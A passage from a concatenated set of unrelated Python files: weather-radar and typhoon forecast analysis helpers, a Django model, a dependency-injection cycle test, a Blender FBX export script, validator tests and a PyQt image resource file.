tmp2d = np.fromfile(infile, dtype=np.dtype('<f4'), count=JMAr_gx*JMAr_gy) # little endian
input2d = np.reshape(tmp2d, (JMAr_gy,JMAr_gx))
input2d[input2d < 0.0] = 0.0 #np.nan # undef is negative in JMA radar
infile.close
if fn == fn1:
rain2d = input2d * 0.5
else:
rain2d += input2d * 0.5
JMArain2d += rain2d / 6 # mm/h -> mm/10min
jtime2 += timedelta(seconds=600)
write_JMA_nc( JMA_data_nc, JMAr_lon, JMAr_lat, jstime, JMArain2d )
print("New file stored: ", JMA_data_nc)
#sys.exit()
return( JMArain2d, JMAr_lon, JMAr_lat)
def write_JMA_nc(JMA_data_nc,JMA_lon,JMA_lat,jstime,JMArain2d):
nc = Dataset(JMA_data_nc, "w", format="NETCDF4")
nc.createDimension("latitude", len(JMA_lat))
nc.createDimension("longitude", len(JMA_lon))
nc.createDimension("level", 1)
nc.createDimension("time", 1)
XX = nc.createVariable("longitude","f4",("longitude",))
XX.units = "degrees_east"
YY = nc.createVariable("latitude","f4",("latitude",))
YY.units = "degrees_north"
ZZ = nc.createVariable("level","i4",("level",))
ZZ.units = "km"
times = nc.createVariable("time","f4",("time",))
nc.description = "Superobs of Himawari-8 IR"
times.units = "hours since " + str(jstime)
times.calendar = "gregorian"
times[0] = 0
XVAR = nc.createVariable("RAIN","f4",("time","level","latitude","longitude"))
XVAR.units = "mm"
XVAR[:,:,:,:] = JMArain2d
XX[:] = JMA_lon
YY[:] = JMA_lat
ZZ[:] = 0
def read_JMA_nc(JMA_data_nc):
print(JMA_data_nc)
nc = Dataset(JMA_data_nc, "r", format="NETCDF4")
JMArain2d = nc.variables['RAIN'][0,0,:,:]
JMA_lon = nc.variables['longitude'][:]
JMA_lat = nc.variables['latitude'][:]
nc.close()
return( JMArain2d, JMA_lon, JMA_lat )
def draw_rec( m, ax, slon, elon, slat, elat, c='k', lw=5.0, ls='solid' ):
slat_l = np.linspace( slat, slat )
elat_l = np.linspace( elat, elat )
slon_l = np.linspace( slon, slon )
elon_l = np.linspace( elon, elon )
lon_l = np.linspace( slon, elon )
lat_l = np.linspace( slat, elat )
x_, y_ = m( lon_l, slat_l )
ax.plot( x_, y_, linewidth=lw, linestyle=ls, color=c )
x_, y_ = m( lon_l, elat_l )
ax.plot( x_, y_, linewidth=lw, linestyle=ls, color=c )
x_, y_ = m( slon_l, lat_l )
ax.plot( x_, y_, linewidth=lw, linestyle=ls, color=c )
x_, y_ = m( elon_l, lat_l )
ax.plot( x_, y_, linewidth=lw, linestyle=ls, color=c )
def draw_prapiroon( m, ax, time=datetime( 2018, 7, 1, 0 ),
c='k', ms=5.0, marker='o', lw=10.0,
c_track='b', ms_track=2.0,
marker_track='o', label=None ):
lats = [ 19.8, 19.8, 19.8, 19.8, 19.8,
19.8, 19.8, 19.9, 20.4, 21.0,
21.8, 22.9, 23.6, 23.9, 24.5,
25.0, 25.4, 25.8, 26.1, 26.7,
27.2, 27.7, 28.2, 28.8, 29.5,
30.1, 30.7, 31.4, 32.0, 32.7,
33.2, 33.9, 34.4, 35.0, 35.6,
37.3, 39.6, 40.6, 40.9, 41.3,
41.7 ]
lons = [ 132.8, 132.2, 131.4, 130.8, 130.3,
129.9, 129.8, 129.7, 129.6, 129.4,
128.8, 128.2, 127.7, 127.3, 127.2,
127.0, 126.9, 126.8, 126.8, 126.8,
127.0, 127.1, 127.4, 127.7, 128.1,
127.9, 127.8, 127.9, 128.2, 128.6,
128.9, 129.3, 129.6, 130.2, 130.8,
132.5, 134.8, 136.6, 138.3, 139.5,
140.2, ]
dates = [ datetime( 2018, 6, 28, 0),
datetime( 2018, 6, 28, 6),
datetime( 2018, 6, 28, 12),
datetime( 2018, 6, 28, 18),
datetime( 2018, 6, 29, 0),
datetime( 2018, 6, 29, 6),
datetime( 2018, 6, 29, 12),
datetime( 2018, 6, 29, 18),
datetime( 2018, 6, 30, 0),
datetime( 2018, 6, 30, 6),
datetime( 2018, 6, 30, 12),
datetime( 2018, 6, 30, 18),
datetime( 2018, 7, 1, 0),
datetime( 2018, 7, 1, 3),
datetime( 2018, 7, 1, 6),
datetime( 2018, 7, 1, 9),
datetime( 2018, 7, 1, 12),
datetime( 2018, 7, 1, 15),
datetime( 2018, 7, 1, 18),
datetime( 2018, 7, 1, 21),
datetime( 2018, 7, 2, 0),
datetime( 2018, 7, 2, 3),
datetime( 2018, 7, 2, 6),
datetime( 2018, 7, 2, 9),
datetime( 2018, 7, 2, 12),
datetime( 2018, 7, 2, 15),
datetime( 2018, 7, 2, 18),
datetime( 2018, 7, 2, 21),
datetime( 2018, 7, 3, 0),
datetime( 2018, 7, 3, 3),
datetime( 2018, 7, 3, 6),
datetime( 2018, 7, 3, 9),
datetime( 2018, 7, 3, 12),
datetime( 2018, 7, 3, 15),
datetime( 2018, 7, 3, 18),
datetime( 2018, 7, 4, 0),
datetime( 2018, 7, 4, 6),
datetime( 2018, 7, 4, 12),
datetime( 2018, 7, 4, 18),
datetime( 2018, 7, 5, 0),
datetime( 2018, 7, 5, 6),
]
xs_, ys_ = m( lons, lats )
if lw > 0.0:
m.plot( xs_, ys_, color=c_track, markersize=ms_track,
marker=marker_track, linewidth=lw, )
if time == datetime( 2018, 6, 28, 0 ):
lat, lon, hpa = 19.8, 132.8, 1006.0
elif time == datetime( 2018, 6, 29, 0 ):
lat, lon, hpa = 19.8, 130.3, 998.0
elif time == datetime( 2018, 6, 30, 0 ):
lat, lon, hpa = 20.4, 129.6, 992.0
elif time == datetime( 2018, 7, 1, 0 ):
lat, lon, hpa = 23.6, 127.7, 985.0
elif time == datetime( 2018, 7, 2, 0 ):
lat, lon, hpa = 27.2, 127.0, 965.0
elif time == datetime( 2018, 7, 3, 0 ):
lat, lon, hpa = 32.0, 128.2, 965.0
elif time == datetime( 2018, 7, 4, 0 ):
lat, lon, hpa = 37.3, 132.5, 985.0
elif time == datetime( 2018, 7, 5, 0 ):
lat, lon, hpa = 41.3, 139.5, 992.0
# elif time == datetime( 2018, 7, 4, 18 ):
# lat, lon, hpa = 37.3, 132.5, 985.0
else:
print("No TC data")
return( np.nan, np.nan, np.nan)
x_, y_ = m( lon, lat )
if ms > 0.0:
m.plot( x_, y_, color=c, markersize=ms,
marker=marker, linewidth=lw, label=label )
return( lon, lat, hpa )
def get_dlm( INFO, stime=datetime(2018,7,1), vtime=datetime(2018,7,1), m=1, dist=np.array([]) ):
#
# Get Deep Layer Mean (DLM) wind
hpa_l = [ 850, 700, 500, 300, 200 ]
mem = str(m).zfill(4)
if m == 0:
mem = "mean"
fn = os.path.join( INFO["TOP"], stime.strftime('%Y%m%d%H%M%S'), "fcst_sno_np00001",
mem, "p_history.pe000000.nc" )
#print(fn)
ft_max = ( vtime - stime ).total_seconds()
with Dataset( fn, "r", format="NETCDF4") as nc:
fts = nc.variables["time"][:]
idx_e = np.abs( ( fts - ft_max ) ).argmin()
prs = nc.variables["pressure"][:] # hPa
idx_v = np.abs( ( prs - hpa_l[0] ) ).argmin()
# dist = 1: within an avaraging area
# = NaN: outside
v = np.nanmean( nc.variables["Vprs"][idx_e,idx_v,:,:] * dist * prs[idx_v] )
u = np.nanmean( nc.variables["Vprs"][idx_e,idx_v,:,:] * dist * prs[idx_v] )
for hpa in hpa_l[1:]:
idx_v = np.abs( ( prs - hpa ) ).argmin()
v += np.nanmean( nc.variables["Vprs"][idx_e,idx_v,:,:] * dist * prs[idx_v] )
u += np.nanmean( nc.variables["Uprs"][idx_e,idx_v,:,:] * dist * prs[idx_v] )
u = u / np.sum( hpa_l )
v = v / np.sum( hpa_l )
return( u, v )
def get_var( INFO, nvar="PW", stime=datetime(2018,7,1), vtime=datetime(2018,7,1), m=1, adt=timedelta(hours=24), hpa=500 ):
if nvar == "PW":
var_ = get_pw( INFO, stime=stime, vtime=vtime, m=m ) * 0.001 # kg/m2
elif nvar == "OLR":
var_ = get_olr( INFO, stime=stime, vtime=vtime, m=m )
elif nvar == "Q1":
var_ = get_q1( INFO, stime=stime, vtime=vtime, m=m, hpa=hpa )
elif nvar == "Q1_vg":
hpa1 = 700
hpa2 = 950
var1_ = get_q1( INFO, stime=stime, vtime=vtime, m=m, hpa=hpa1 )
var2_ = get_q1( INFO, stime=stime, vtime=vtime, m=m, hpa=hpa2 )
var_ = ( var1_ - var2_ ) / ( ( hpa1 - hpa2 ) * 1.e2 )
elif nvar == "VORT":
_, var_ = get_hdiv_curl( INFO, stime=stime, vtime=vtime, m=m, hpa=hpa )
elif nvar == "HDIV":
var_, _ = get_hdiv_curl( INFO, stime=stime, vtime=vtime, m=m, hpa=hpa )
elif nvar == "Z":
var_ = get_gph( INFO, stime=stime, vtime=vtime, m=m, hpa=hpa )
elif nvar == "RH":
var_ = get_rh( INFO, stime=stime, vtime=vtime, m=m, hpa=hpa )
elif nvar == "THE" or nvar == "EPT":
var_ = get_the( INFO, stime=stime, vtime=vtime, m=m, hpa=hpa )
elif nvar == "THEG":
v1_, v2_ = get_the_grad( INFO, stime=stime, vtime=vtime, m=m, hpa=hpa )
var_ = np.sqrt( np.square( v1_ ) + np.square( v2_ ) )
elif nvar == "RAIN":
var_ = get_arain( INFO, stime=stime, vtime=vtime,
adt=adt, m=m )
elif nvar == "MFY" or nvar == "MFX":
q_ = get_prsvar( INFO, nvar="QVprs", stime=stime, vtime=vtime, m=m, hpa=hpa )
if nvar == "MFY":
v_ = get_prsvar( INFO, nvar="Vprs", stime=stime, vtime=vtime, m=m, hpa=hpa )
elif nvar == "MFX":
v_ = get_prsvar( INFO, nvar="Uprs", stime=stime, vtime=vtime, m=m, hpa=hpa )
var_ = q_ * v_
elif nvar == "MSLP":
var_ = get_mslp( INFO, stime=stime, vtime=vtime, m=m ) * 0.01 # hPa
else:
var_ = get_prsvar( INFO, nvar=nvar+"prs", stime=stime, vtime=vtime, m=m, hpa=hpa )
return( var_ )
def get_pw( INFO, stime=datetime(2018,7,1), vtime=datetime(2018,7,1), m=1 ):
mem = str(m).zfill(4)
if m == 0:
mem = "mean"
fn = os.path.join( INFO["TOP"], stime.strftime('%Y%m%d%H%M%S'), "fcst_sno_np00001",
mem, "p_history.pe000000.nc" )
ft_max = ( vtime - stime ).total_seconds()
with Dataset( fn, "r", format="NETCDF4") as nc:
# print("time", fts/3600)
try:
fts = nc.variables["time"][:]
idx_e = np.abs( ( fts - ft_max ) ).argmin()
pw = nc.variables["PW"][idx_e,:,:]
except:
print( "No time" )
pw = nc.variables["PW"][:,:]
return( pw )
def get_hdiv_curl( INFO, stime=datetime(2018,7,1), vtime=datetime(2018,7,1), m=1, hpa=500 ):
u_ = get_prsvar( INFO, nvar="Uprs", stime=stime, vtime=vtime, m=m, hpa=hpa )
v_ = get_prsvar( INFO, nvar="Vprs", stime=stime, vtime=vtime, m=m, hpa=hpa )
u_[ u_ < -200 ] = np.nan
v_[ v_ < -200 ] = np.nan
[ dudy, dudx ] = np.gradient( u_, axis=(0,1) )
[ dvdy, dvdx ] = np.gradient( v_, axis=(0,1) )
div = ( dudx + dvdy ) * rDX
curl = ( dvdx - dudy ) * rDX
return( div, curl )
def get_prapiroon( time=datetime( 2018, 7, 1, 0 ) ):
lats = [ 19.8, 19.8, 19.8, 19.8, 19.8,
19.8, 19.8, 19.9, 20.4, 21.0,
21.8, 22.9, 23.6, 23.9, 24.5,
25.0, 25.4, 25.8, 26.1, 26.7,
27.2, 27.7, 28.2, 28.8, 29.5,
30.1, 30.7, 31.4, 32.0, 32.7,
33.2, 33.9, 34.4, 35.0, 35.6,
37.3, 39.6, 40.6, 40.9, 41.3,
41.7 ]
lons = [ 132.8, 132.2, 131.4, 130.8, 130.3,
129.9, 129.8, 129.7, 129.6, 129.4,
128.8, 128.2, 127.7, 127.3, 127.2,
127.0, 126.9, 126.8, 126.8, 126.8,
127.0, 127.1, 127.4, 127.7, 128.1,
127.9, 127.8, 127.9, 128.2, 128.6,
128.9, 129.3, 129.6, 130.2, 130.8,
132.5, 134.8, 136.6, 138.3, 139.5,
140.2, ]
dates = np.array(
[ datetime( 2018, 6, 28, 0),
datetime( 2018, 6, 28, 6),
datetime( 2018, 6, 28, 12),
datetime( 2018, 6, 28, 18),
datetime( 2018, 6, 29, 0),
datetime( 2018, 6, 29, 6),
datetime( 2018, 6, 29, 12),
datetime( 2018, 6, 29, 18),
datetime( 2018, 6, 30, 0),
datetime( 2018, 6, 30, 6),
datetime( 2018, 6, 30, 12),
datetime( 2018, 6, 30, 18),
datetime( 2018, 7, 1, 0),
datetime( 2018, 7, 1, 3),
datetime( 2018, 7, 1, 6),
datetime( 2018, 7, 1, 9),
datetime( 2018, 7, 1, 12),
datetime( 2018, 7, 1, 15),
datetime( 2018, 7, 1, 18),
datetime( 2018, 7, 1, 21),
datetime( 2018, 7, 2, 0),
datetime( 2018, 7, 2, 3),
datetime( 2018, 7, 2, 6),
datetime( 2018, 7, 2, 9),
datetime( 2018, 7, 2, 12),
datetime( 2018, 7, 2, 15),
datetime( 2018, 7, 2, 18),
datetime( 2018, 7, 2, 21),
datetime( 2018, 7, 3, 0),
datetime( 2018, 7, 3, 3),
datetime( 2018, 7, 3, 6),
datetime( 2018, 7, 3, 9),
datetime( 2018, 7, 3, 12),
datetime( 2018, 7, 3, 15),
datetime( 2018, 7, 3, 18),
datetime( 2018, 7, 4, 0),
datetime( 2018, 7, 4, 6),
datetime( 2018, 7, 4, 12),
datetime( 2018, 7, 4, 18),
datetime( 2018, 7, 5, 0),
datetime( 2018, 7, 5, 6),
] )
dif = 999999999
for i in range( len(dates) ):
sec = np.abs( (dates[i] - time).total_seconds() )
if sec < dif:
dif = sec
elif sec >= dif:
break
return( lons[i-1], lats[i-1], dates[i-1] )
def get_q1( INFO, stime=datetime(2018,7,1), vtime=datetime(2018,7,1), m=1, hpa=500 ):
mem = str(m).zfill(4)
if m == 0:
mem = "mean"
fn = os.path.join( INFO["TOP"], stime.strftime('%Y%m%d%H%M%S'), "fcst_sno_np00001",
mem, "p_history.pe000000.nc" )
ft_max = ( vtime - stime ).total_seconds()
with Dataset( fn, "r", format="NETCDF4") as nc:
prs = nc.variables["pressure"][:] # hPa
idx_v = np.abs( ( prs - hpa ) ).argmin()
fts = nc.variables["time"][:]
idx_e = np.abs( ( fts - ft_max ) ).argmin()
rho_ = nc.variables["DENSprs"][idx_e,idx_v,:,:]
omega_ = -nc.variables["Wprs"][idx_e,idx_v,:,:] * rho_ * grav
tk_ = nc.variables["Tprs"][idx_e,idx_v,:,:]
u_ = nc.variables["Uprs"][idx_e,idx_v,:,:]
v_ = nc.variables["Vprs"][idx_e,idx_v,:,:]
[ dTdy_, dTdx_ ] = np.gradient( tk_, axis=(0,1) )
dTdt_ = ( nc.variables["Tprs"][idx_e+1,idx_v,:,:] - nc.variables["Tprs"][idx_e-1,idx_v,:,:] ) / ( 12*3600.0 )
sigma_ = Rd * tk_ / ( cp*hpa*1.e2 ) - \
( nc.variables["Tprs"][idx_e,idx_v+1,:,:] - \
nc.variables["Tprs"][idx_e,idx_v-1,:,:] ) / \
( ( prs[idx_v+1] - prs[idx_v-1] )*1.e2 )
q1 = cp * dTdt_ - cp * ( omega_ * sigma_ - u_ * dTdx_ * rDX - v_ * dTdy_ * rDX )
return( q1 )
def def_cmap( nvar="RAIN", hpa=950, dth=24 ):
fac = 1.0
extend = "max"
cmap = plt.cm.get_cmap("jet")
tvar = nvar
if nvar == "RAIN":
levs = np.arange( 10, 155, 5 )
unit = "(mm/{0:}h)".format( dth )
elif nvar == "Q1_vg":
levs = np.arange( -100, 105, 5 )
unit = "()"
fac = 1.e6
extend = "both"
cmap = plt.cm.get_cmap("RdBu_r")
elif nvar == "HDIV":
levs = np.arange( -5, 6, 1 )
unit = r'(10$^5$s$^{-1}$)'
fac = 1.e5
extend = "both"
cmap = plt.cm.get_cmap("RdBu_r")
tvar = nvar + str( hpa )
elif nvar == "VORT":
levs = np.arange( -10, 12, 2 )
unit = r'(10$^{-5}$s$^{-1}$)'
fac = 1.e5
extend = "both"
cmap = plt.cm.get_cmap("RdBu_r")
tvar = nvar + str( hpa )
elif nvar == "Q1":
levs = np.arange( 10, 155, 5 )
unit = "()"
fac = 1.e2
elif nvar == "OLR":
cmap.set_under('gray',alpha=1.0)
levs = np.arange( 80, 305, 5 )
# cmap = plt.cm.get_cmap("Greys")
unit = r'(W/m$^2$)'
extend = "both"
elif nvar == "MSLP":
levs = np.arange( 0, 1400, 4)
unit = "(hPa)"
elif nvar == "Z":
levs = np.arange( 0, 13000, 20 )
unit = "(m)"
tvar = nvar + str( hpa )
elif nvar == "QV":
cmap = plt.cm.get_cmap("BrBG")
levs = np.arange( 0, 19.0, 1 )
if hpa < 850:
levs = np.arange( 0, 8.0, 0.5 )
if hpa < 700:
levs = np.arange( 0, 4.25, 0.25 )
levs = np.arange( 0, 6.25, 0.25 )
unit = r'(g/m$^3$)'
fac = 1.e3
tvar = nvar + str( hpa )
elif nvar == "PW":
levs = np.arange( 0, 72.5, 2.5)
#cmap = plt.cm.get_cmap("Blues")
cmap = plt.cm.get_cmap("hot_r")
unit = r'(mm/m$^{2}$)'
elif nvar == "THE" or nvar == "EPT":
levs = np.arange( 280, 340, 2)
unit = "(K)"
cmap = plt.cm.get_cmap("jet")
tvar = r'$\theta_e$' + str( hpa )
elif nvar == "T":
cmap = plt.cm.get_cmap("RdBu_r")
levs = np.arange( 284, 297, 1 )
unit = '(K)'
extend = 'both'
if hpa < 400:
levs = np.arange( 238, 251, 1 )
elif hpa < 600:
levs = np.arange( 264, 275, 1 )
tvar = nvar + str( hpa )
elif nvar == "U":
levs = np.arange( -36, 39, 3 )
cmap = plt.cm.get_cmap("RdBu_r")
extend = 'both'
unit = '(m/s)'
tvar = nvar + str( hpa )
elif nvar == "V":
levs = np.arange( -20, 22, 2 )
cmap = plt.cm.get_cmap("RdBu_r")
extend = 'both'
unit = '(m/s)'
tvar = nvar + str( hpa )
elif nvar == "RH":
cmap = plt.cm.get_cmap("BrBG")
levs = np.arange( 10, 95, 5 )
fac = 1.e2
extend = 'both'
unit = '(%)'
tvar = nvar + str( hpa )
return( cmap, levs, unit, extend, tvar, fac )
def read_etrack( stime=datetime(2018, 7, 1, 0),
ng=3,
dlon=2.0 ):
opath = "dat/track"
of = "track_s{0:}_ng{1:0=3}_dlon{2:}.npz".format( stime.strftime('%m%d'), int( ng ), dlon )
print( of )
data = np.load( os.path.join( opath, of ), allow_pickle=True )
tclat_l = data['tclat_l']
tclon_l = data['tclon_l']
tcmslp_l = data['tcmslp_l']
time_l = data['time_l']
return( np.array( tclon_l ), np.array( tclat_l ), np.array( tcmslp_l ),
np.array( time_l ) )
def get_steering_flow( INFO, tclon=130.0, tclat=30.0, m=1,
lon2d=np.zeros(1), lat2d=np.zeros(1),
stime=datetime( 2018, 7, 5, 0 ),
vtime=datetime( 2018, 7, 5, 0 ),
hpa_l = [ 850, 700, 500, ], # Velden and Leslie 1991WAF for weak TCs
tc_rad=5.0 ):
dist = np.sqrt( np.square( lon2d - tclon ) + np.square( lat2d - tclat ) )
j,i = np.unravel_index( np.argmin( dist ), dist.shape )
u = 0.0
v = 0.0
for p, hpa in enumerate( hpa_l ):
u_ = get_var( INFO, nvar="U", stime=stime, vtime=vtime, m=m+1, hpa=hpa )
v_ = get_var( INFO, nvar="V", stime=stime, vtime=vtime, m=m+1, hpa=hpa )
u_[ dist > tc_rad ] = np.nan
v_[ dist > tc_rad ] = np.nan
u += np.nanmean( u_ ) * hpa
v += np.nanmean( v_ ) * hpa
return( u/sum(hpa_l), v/sum(hpa_l) )
def get_rain_idx( INFO, slon=130.0, elon=137.5, slat=33.0, elat=36.0,
adt_h=24, mmax=50, vtime_ref=datetime( 2018, 7, 6, 0 ),
stime=datetime( 2018, 7, 2, 0 ) ):
lon2d, lat2d = get_lonlat( INFO, stime=datetime( 2018, 7, 1, 0 ) )
adt = timedelta( hours=adt_h )
rain_l = np.zeros( mmax )
# get reference
for m in range( mmax ):
rain_ = get_var( INFO, nvar="RAIN", stime=stime, vtime=vtime_ref, m=m+1, adt=adt )
rain_l[m] = np.mean( rain_[ (lon2d >= slon ) & (lon2d <= elon) & (lat2d >= slat) & (lat2d <= elat) ] )
mem_l = np.argsort( rain_l )[::-1]
rain_l = np.sort( rain_l )[::-1]
return( rain_l, mem_l )
def get_olr( INFO, stime=datetime(2018,7,1), vtime=datetime(2018,7,1), m=1 ):
mem = str(m).zfill(4)
if m == 0:
mem = "mean"
fn = os.path.join( INFO["TOP"], stime.strftime('%Y%m%d%H%M%S'), "fcst_sno_np00001",
mem, "p_history.pe000000.nc" )
ft_max = ( vtime - stime ).total_seconds()
with Dataset( fn, "r", format="NETCDF4") as nc:
# print("time", fts/3600)
try:
fts = nc.variables["time"][:]
idx_e = np.abs( ( fts - ft_max ) ).argmin()
olr = nc.variables["OLR"][idx_e,:,:]
except:
print( "No time" )
olr = nc.variables["OLR"][:,:]
return( olr )
def read_obs_letkf( time ):
otop = "/data_ballantine02/miyoshi-t/honda/SCALE-LETKF/BAIU2018_5.3.6/ncepobs_letkf"
fn = os.path.join( otop, "obs_" + time.strftime('%Y%m%d%H%M%S.dat') )
print(fn)
infile = open( fn )
data = np.fromfile( infile, dtype=np.dtype('>f4') )
infile.close
nobs = int( data.shape[0]/(8+2) ) # wk(8) + header + footer in one record
#obs_all = np.zeros((8,nobs))
#obs_all = data.reshape(10,nobs)
obs_all = data.reshape(nobs,10)
return( obs_all[:,1:9] )
def read_obsdep_letkf( time ):
otop = "/data_ballantine02/miyoshi-t/honda/SCALE-LETKF/BAIU2018_5.3.6"
idir = os.path.join( otop, time.strftime('%Y%m%d%H%M%S'), "obs" )
fn = os.path.join( idir, "obsdep.dat" )
print( fn )
infile = open( fn )
data = np.fromfile( infile, dtype=np.dtype('>f4') )
infile.close
nobs = int( data.shape[0]/(11+2) ) # wk(11) + header + footer in one record
#obs_all = np.zeros((8,nobs))
#obs_all = data.reshape(10,nobs)
obsdep_all = data.reshape(nobs,13)
return( obsdep_all[:,1:12] )
def read_Him8( time=datetime( 2018, 7, 5, 0 ) ):
fn = "/data9/honda/himawari_real/HIMAWARI-8/HISD/Hsfd/{0:}/00/B13/DLON0.02_DLAT0.02_HS_H08_{1:}_B13_FLDK.nc".format( time.strftime('%Y%m/%d/%Y%m%d0000'), time.strftime('%Y%m%d_%H00') )
with Dataset( fn, "r", format="NETCDF4") as nc:
tbb = nc.variables["tbb"][:]
lon = nc.variables["longitude"][:]
lat = nc.variables["latitude"][:]
lon2d, lat2d = np.meshgrid( lon, lat )
return( tbb, lon2d, lat2d )
def cmap_Him8():
colors1 = plt.cm.jet_r(np.linspace(0, 1, 128 ))
colors2 = plt.cm.binary(np.linspace(0., 1, 128 )) # w/k
colors = np.vstack((colors1, colors2))
cmap = mcolors.LinearSegmentedColormap.from_list('my_colormap', colors)
levs = np.arange( 200, 304, 4 )
return( cmap, levs )
|
from django.db import models
from .page import Page
class RunResult(models.Model):
page = models.ForeignKey(
Page,
related_name="run_results",
on_delete=models.CASCADE,
)
created_at = models.DateTimeField(auto_now_add=True)
def get_prices(self):
return [node.price for node in self.html_nodes.all()]
def __str__(self):
return (
f'<RunResult '
f'page="{self.page.get_readable_url()}" '
f'prices={str(self.get_prices())}>'
)
|
"""Tested only when using Annotated since it's impossible to create a cycle using default values"""
import pytest
from di.container import Container
from di.dependant import Dependant, Marker
from di.exceptions import DependencyCycleError
from di.typing import Annotated
# These methods need to be defined at the global scope for
# forward references to be resolved correctly at runtime
def dep1(v: "Annotated[int, Marker(dep2)]") -> None: # type: ignore
... # pragma: no cover
def dep2(v: "Annotated[int, Marker(dep1)]") -> None:
... # pragma: no cover
def test_cycle() -> None:
container = Container()
with container.enter_scope(None):
with pytest.raises(DependencyCycleError, match="are in a cycle"):
container.solve(Dependant(dep1), scopes=[None])
|
import bpy
import os
#the only difference between this version and the other one is that this one remove the mirror
#modifier if there is only mesh, this is useful to import on apps like substance painter which is my workflow.
pathWay = bpy.data.filepath
objs = bpy.context.selected_objects
nameWay = os.path.splitext(pathWay)[0]
def ShowMessageBox(message = "", title = "Message Box", icon = 'INFO'):
def draw(self, context):
self.layout.label(text = message)
bpy.context.window_manager.popup_menu(draw, title = title, icon = icon)
types = set([obj.type for obj in objs])
print(f'saw types: {types}', nameWay,)
if 'ARMATURE' in types and 'MESH' in types:
theCall = 'Mesh with armature exported'
fileName = nameWay + '_armaMesh.fbx'
objINCLUDE = {'ARMATURE','MESH','OTHER'}
bake = False
elif 'MESH' in types:
theCall = 'only meshes exported'
fileName = nameWay + '_meshOnly.fbx'
objINCLUDE = {'MESH','OTHER'}
bake = False
obj.modifiers.remove(type='MIRROR')
else:
theCall = 'Only armature, and animations axported'
fileName = nameWay + '_armaAnim.fbx'
objINCLUDE = {'ARMATURE','OTHER'}
bake = True
print(fileName,objINCLUDE,bake,nameWay)
print(nameWay) #test print if my set of variables are working
bpy.ops.export_scene.fbx(use_selection = True ,
path_mode = 'RELATIVE',
filepath = fileName ,
use_armature_deform_only = True,
add_leaf_bones = False,
object_types = objINCLUDE ,
axis_forward ='Z',
bake_anim = bake ,
bake_anim_use_all_bones = True)
ShowMessageBox(theCall)
#this piece of shit code is made by bento césar (@gostbento everywhere)
#with help from some guys from discord
#feel free to use it however you like
#if this breaks anything it is not my fault. be safe eat salad.
|
import os
from pathlib import Path
from portunus.validators import ImageValidator
from portunus.validators import IPValidator
from portunus.validators import NumberValidator
from portunus.validators import PortValidator
from portunus.validators import VolumeValidator
class Document:
def __init__(self, string):
self.text = string
def test_ip_validator():
IPValidator().validate(Document('192.168.1.1'))
def test_image_validator():
Path('test.img').touch()
ImageValidator().validate(Document('test.img'))
os.remove('test.img')
def test_number_validator():
NumberValidator().validate(Document('1'))
def test_port_validator():
PortValidator().validate(Document('1'))
def test_volume_validator():
Path('test').mkdir()
VolumeValidator().validate(Document('test'))
os.rmdir('test')
|
# -*- coding: utf-8 -*-
# Resource object code
#
# Created by: The Resource Compiler for PyQt5 (Qt v5.12.5)
#
# WARNING! All changes made in this file will be lost!
# from PyQt5 import QtCore
from silx.gui import qt as QtCore
qt_resource_data = b"\
\x00\x00\x19\x3d\
\x89\
\x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52\x00\
\x00\x00\x32\x00\x00\x00\x32\x08\x06\x00\x00\x00\x1e\x3f\x88\xb1\
\x00\x00\x00\x06\x62\x4b\x47\x44\x00\xff\x00\xff\x00\xff\xa0\xbd\
\xa7\x93\x00\x00\x00\x09\x70\x48\x59\x73\x00\x00\x0b\x13\x00\x00\
\x0b\x13\x01\x00\x9a\x9c\x18\x00\x00\x00\x07\x74\x49\x4d\x45\x07\
\xe3\x01\x1e\x09\x34\x07\xfb\x3d\x97\x4b\x00\x00\x00\x1d\x69\x54\
\x58\x74\x43\x6f\x6d\x6d\x65\x6e\x74\x00\x00\x00\x00\x00\x43\x72\
\x65\x61\x74\x65\x64\x20\x77\x69\x74\x68\x20\x47\x49\x4d\x50\x64\
\x2e\x65\x07\x00\x00\x18\xa1\x49\x44\x41\x54\x68\xde\x35\x99\x67\
\x7c\x55\x55\xfa\xb6\xaf\xbd\x4f\x4b\x4e\x7a\x25\x09\x25\x09\x09\
\x1d\x44\x91\x26\x8a\xe8\x20\x4a\x71\x44\x01\xb1\x2b\x16\xb0\xcc\
\x60\xc1\xae\xef\x08\x63\x77\xfe\x3a\xa2\xa0\x88\x0c\x16\xac\x88\
\x0a\xa2\xa0\x02\x4a\x13\x51\x40\x40\x7a\x42\x4d\x02\x49\x48\x2f\
\x27\x27\xa7\xee\xfb\xfd\xb0\xb7\x9f\xf2\xcb\x29\xfb\xac\x67\xad\
\xfb\xb9\xcb\x7a\x8c\xbc\xe8\x70\xcd\xef\xdc\xc1\x75\x07\x80\x10\
\x3c\xd0\x7b\x04\x1b\xbb\xee\x66\xcf\xe6\x28\xae\x19\x49\x30\xa6\
\x83\xfa\x39\x30\xe3\x1c\xe8\x0d\x0c\xee\xf0\x32\xe3\xd9\x08\x2c\
\xc9\x83\x48\x36\x0c\x38\x08\xe3\xc5\xee\x3b\xe0\x9b\x42\xd8\x0d\
\x7c\xb0\x03\xd2\xbe\x06\xf7\x27\x5d\xe0\xf4\x28\x70\xf9\x20\xe5\
\x04\x47\x56\xed\xa0\x6a\x84\x49\x69\xd8\x22\x73\x85\x9b\xb4\xc7\
\xa6\x42\x73\x6f\x02\x23\x9b\x49\x78\x66\x09\xee\x6f\xc3\x84\xa3\
\x26\xbe\x7d\x97\x62\xb5\xe7\xa3\x59\x3f\x62\xae\xf6\xf3\xf6\xab\
\x11\xae\x5f\x94\x8f\x7b\xe5\x85\x7c\x78\xaf\x9f\xa9\x89\xaf\x52\
\x7b\xf6\x3a\x1a\xc9\x67\xe0\xb7\x43\xd9\xfe\xf7\xcf\x30\xbf\x6b\
\xde\xcf\xdf\x6a\x81\xb9\x40\x03\x6c\xe9\x7a\x88\x7f\x54\x47\x71\
\x7d\x0d\x9c\xee\x0f\x87\xa1\x79\x3f\x1c\xc7\xcf\x50\x60\xc6\xbf\
\x2c\xf8\x4f\x7f\x68\x1e\x00\x1d\xbd\xe0\x60\x0a\x08\xb2\x42\x70\
\x3e\xb0\x28\x0c\x49\x19\x10\x9e\x0a\x34\x74\x03\x6e\x82\xf8\xc3\
\xd0\xf2\x02\x7d\x2f\x99\xc1\xa8\x45\x09\x14\xd7\x42\x5a\x38\x0e\
\x1d\x6d\x44\x18\x88\xf7\xb7\x97\x30\x27\x7e\x47\xa8\xde\xc0\xb7\
\x29\x87\xd6\xa3\x23\xd0\xa9\x2c\x5c\x8f\x4d\xc0\x38\xe4\xa1\xf7\
